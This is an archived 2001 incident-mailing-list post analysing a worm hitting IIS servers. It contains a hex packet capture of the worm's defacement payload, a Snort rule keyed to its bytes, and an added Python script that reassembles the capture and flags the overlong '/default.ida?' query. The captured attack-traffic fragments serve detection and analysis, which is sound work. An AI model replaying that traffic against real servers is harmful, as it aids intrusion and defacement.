    > 0x0360   2f68 6561 643e 3c62 6164 793e 3c68 7220        /head><bady><hr.
    > 0x0370   7369 7a65 3d35 3e3c 666f 6e74 2063 6f6c        size=5><font.col
    > 0x0380   6f72 3d22 7265 6422 3e3c 7020 616c 6967        or="red"><p.alig
    > 0x0390   6e3d 2263 656e 7465 7222 3e57 656c 636f        n="center">Welco
    > 0x03a0   6d65 2074 6f20 6874 7470 3a2f 2f77 7777        me.to.http://www
    > 0x03b0   2e77 6f72 6d2e 636f 6d20 213c 6272 3e3c        .worm.com.!<br><
    > 0x03c0   6272 3e48 6163 6b65 6420 4279 2043 6869        br>Hacked.By.Chi
    > 0x03d0   6e65 7365 213c 2f66 6f6e 743e 3c2f 6872        nese!</font></hr
    > 0x03e0   3e3c 2f62 6164 793e 3c2f 6874 6d6c 3e20        ></bady></html>.
    > 0x03f0   2020 2020 2020 2020 2020 2020 2020 2020        ................
    > 0x0400   2020 2020 2020 2020 2020 2020 2020 2020        ................
    > 0x0410   2020 2020 2020 2020 2020 2020 2020 2020        ................
    > 0x0420   2020 2020 2020 2020 2020 2020 2020 2020        ................
    > 0x0430   2020 2020 2020 2020 2020 2020 2020 2020        ................
    > 0x0440   2020 2020 2020 2020 2020 2020 2020 2020        ................
    > 0x0450   2020 2020 2020 2020 2020 2020 2020 2020        ................
    > 0x0460   2020 2020 2020 2020 2020 2020 2020 2020        ................
    > 0x0470   2020 2020 2020 2020 2020 2020 2020 2020        ................
    > 0x0480   2020 20                                        ...
    > 
    > Any ideas? If this is a worm, it's already got 7650 hosts. I'm logging this all the logs on my IDS hosts with the following signature:
    > alert TCP $EXTERNAL any -> $INTERNAL any (msg: "Hacked by Chinese"; dsize: >1000; flags: P+; content: "|2e776f72 6d2e636f 6d20213c 62723e3c|";)
    > 
    > Having just written the rule and popped it in the IDS, I've seen 34 connections from 11 different hosts. Looks bad.
    > 
    > Rgds,
    > 
    > --
    > 
    > Scott Nursten - Systems Administrator
    > ----------------------------------------------
    > ddi:   +44 (0) 1293 744 122
    > work:  +44 (0) 1293 402 040
    > fax:   +44 (0) 1293 402 050
    > email: scottnat_private
    > wwweb: http://www.streetsonline.co.uk
    > ----------------------------------------------
    > 
    >                         "Without order nothing can exist - without chaos nothing can evolve."
    
    -- 
    
    Scott Nursten - Systems Administrator
    ----------------------------------------------
    ddi:   +44 (0) 1293 744 122
    work:  +44 (0) 1293 402 040
    fax:   +44 (0) 1293 402 050
    email: scottnat_private
    wwweb: http://www.streetsonline.co.uk
    ----------------------------------------------
    
    			"Without order nothing can exist - without chaos nothing can evolve."
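The following is an added example, not part of Scott's mail or of any tool mentioned in it. It takes tcpdump -X output of the kind pasted above, walks the IP and TCP headers to carve each payload (trimming the Ethernet padding that makes the 4-byte "GET " segment print as "GET.e@"), reassembles each client-to-server flow by sequence number, and then runs two checks over the reassembled request: the content bytes exactly as written in the Snort rule in the quoted mail, and a check for the "/default.ida?" query stuffed with "N" characters. The sample input is made of header and hex lines copied from the captures above; only the first hex lines of the 1500-byte packet and of the quoted 1155-byte packet are kept, so the parser records the offset jump as a gap. The function names, the "min_run" threshold and the hit labels are my own choices, not anything from the thread.

```python
"""Reassemble the client->server HTTP request from tcpdump -X output and run the two
checks discussed in this thread over it (added example; not from the original mail)."""
import re
import struct
from collections import defaultdict

# Sample input: header and hex lines copied from the captures in this thread. Only the
# first hex lines of the 1500-byte packet and of the quoted 1155-byte packet are kept;
# the elided lines are 'N' padding and shellcode that these checks do not need.
SAMPLE = """\
19:15:38.202867 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 1:5(4) ack 1 win 8760 (DF) (ttl 116, id 49163, len 44)
0x0000   4500 002c c00b 4000 7406 66f1 d956 d651        E..,..@.t.f..V.Q
0x0010   c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131        ..m....P......11
0x0020   5018 2238 dbc6 0000 4745 5420 6540             P."8....GET.e@

19:15:38.404751 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 5:1465(1460) ack 1 win 8760 (DF) (ttl 116, id 49164, len 1500)
0x0000   4500 05dc c00c 4000 7406 6140 d956 d651        E.....@.t.a@.V.Q
0x0010   c282 6da4 0fc5 0050 e2c8 0dc7 04c3 3131        ..m....P......11
0x0020   5018 2238 73c8 0000 2f64 6566 6175 6c74        P."8s.../default
0x0030   2e69 6461 3f4e 4e4e 4e4e 4e4e 4e4e 4e4e        .ida?NNNNNNNNNNN
0x0040   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN

18:59:07.487672 210.239.180.224.32769 > 194.130.109.164.80: P [tcp sum ok] 2925:4040(1115) ack 1 win 17520 (DF) (ttl 104, id 46743, len 1155)
0x0000   4500 0483 b697 4000 6806 9fe6 d2ef b4e0        E.....@.h.......
0x0010   c282 6da4 8001 0050 c56d 3b34 c6fa 9e83        ..m....P.m;4....
0x0020   5018 4470 5da3 0000 ff8b 8d64 feff ff0f        P.Dp]......d....
0x03b0   2e77 6f72 6d2e 636f 6d20 213c 6272 3e3c        .worm.com.!<br><
0x03c0   6272 3e48 6163 6b65 6420 4279 2043 6869        br>Hacked.By.Chi
"""

HDR_RE = re.compile(r"^(\d\d:\d\d:\d\d\.\d+) (\d+\.\d+\.\d+\.\d+)\.(\d+) > "
                    r"(\d+\.\d+\.\d+\.\d+)\.(\d+): ")
# Content bytes exactly as written in the Snort rule in the quoted mail: b".worm.com !<br><"
RULE_CONTENT = bytes.fromhex("2e776f72 6d2e636f 6d20213c 62723e3c")
IDA_RE = re.compile(rb"GET /default\.ida\?(N+)")


def splice(chunks):
    """Join hex lines in offset order. An offset jump means lines were left out of the
    dump; it is counted as a gap and skipped, so the result can be shorter than the frame."""
    buf, expected, gaps = bytearray(), 0, 0
    for off, data in sorted(chunks):
        if off != expected:
            gaps += 1
        buf += data
        expected = off + len(data)
    return bytes(buf), gaps


def parse_hexdump(text):
    """Split tcpdump -X text into packets: one header line, then 0xNNNN hex lines."""
    packets, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        m = HDR_RE.match(line)
        if m:
            cur = {"time": m.group(1), "src": (m.group(2), int(m.group(3))),
                   "dst": (m.group(4), int(m.group(5))), "chunks": []}
            packets.append(cur)
            continue
        parts = re.split(r"\s{2,}", line)        # offset | hex groups | ASCII column
        if cur is not None and len(parts) >= 2 and parts[0].startswith("0x"):
            cur["chunks"].append((int(parts[0], 16), bytes.fromhex(parts[1])))
    for p in packets:
        p["raw"], p["gaps"] = splice(p["chunks"])
    return packets


def tcp_payload(raw):
    """Walk the IPv4 and TCP headers to the payload. The IP total length trims the
    Ethernet padding tcpdump prints after short frames (the 'e@' after 'GET ')."""
    if len(raw) < 40 or raw[9] != 6:             # too short, or not TCP
        return None
    ihl = (raw[0] & 0x0F) * 4
    total_len = struct.unpack("!H", raw[2:4])[0]
    tcp = raw[ihl:]
    seq = struct.unpack("!I", tcp[4:8])[0]
    doff = (tcp[12] >> 4) * 4
    return seq, raw[ihl + doff:min(total_len, len(raw))]


def reassemble(packets):
    """Group payloads by (src, dst) and order them by absolute sequence number."""
    flows = defaultdict(list)
    for p in packets:
        carved = tcp_payload(p["raw"])
        if carved and carved[1]:
            flows[(p["src"], p["dst"])].append(carved)
    return {k: b"".join(d for _, d in sorted(v)) for k, v in flows.items()}


def classify(stream, min_run=20):
    """Checks from the thread: the .ida query stuffed with 'N' (224 of them in the full
    capture; min_run is low here because the sample keeps only 27) and the rule content."""
    hits = []
    m = IDA_RE.search(stream)
    if m and len(m.group(1)) >= min_run:
        hits.append("ida-overlong-query(%d N)" % len(m.group(1)))
    if RULE_CONTENT in stream:
        hits.append("hacked-by-chinese-content")
    return hits


def analyse(text):
    return {flow: classify(stream) for flow, stream in reassemble(parse_hexdump(text)).items()}


if __name__ == "__main__":
    for flow, hits in analyse(SAMPLE).items():
        print(flow, hits or "clean")
```

Two things the sample brings out: the request line only exists after reassembly, because "GET " and "/default.ida?..." arrive in separate segments, so a per-packet content match on "GET /default.ida" would miss it; and the rule content from the quoted mail matches the HTML in the later segment, which is why that rule fired while the overflow itself sat in the first 1460 bytes.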
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 12:37:56 PDT